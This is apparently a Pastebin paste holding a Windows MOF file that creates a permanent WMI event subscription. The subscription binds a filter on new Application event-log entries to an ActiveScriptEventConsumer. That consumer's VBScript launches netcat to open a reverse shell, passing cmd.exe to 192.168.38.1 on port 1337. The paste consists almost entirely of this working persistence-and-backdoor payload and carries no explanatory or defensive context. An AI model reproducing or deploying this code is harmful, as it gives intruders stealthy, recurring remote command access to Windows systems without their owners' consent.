Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- >#pragma namespace ("\\\\.\\root\\subscription")
- instance of __EventFilter as $FILTER
- {
- Name = "CLASS_FIRST_TEST";
- EventNamespace = "root\\cimv2";
- Query = "SELECT * FROM __InstanceCreationEvent "
- "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
- "TargetInstance.LogFile=\"Application\"";
- QueryLanguage = "WQL";
- };
- instance of ActiveScriptEventConsumer as $CONSUMER
- {
- Name = "CLASS_FIRST_TEST";
- ScriptingEngine = "VBScript";
- ScriptText =
- "Set objShell = CreateObject(\"WScript.Shell\")\n"
- "objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 192.168.38.1 1337 -e C:\\Windows\\system32\\cmd.exe\"\n";
- };
- instance of __FilterToConsumerBinding
- {
- Consumer = $CONSUMER ;
- Filter = $FILTER ;
- };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement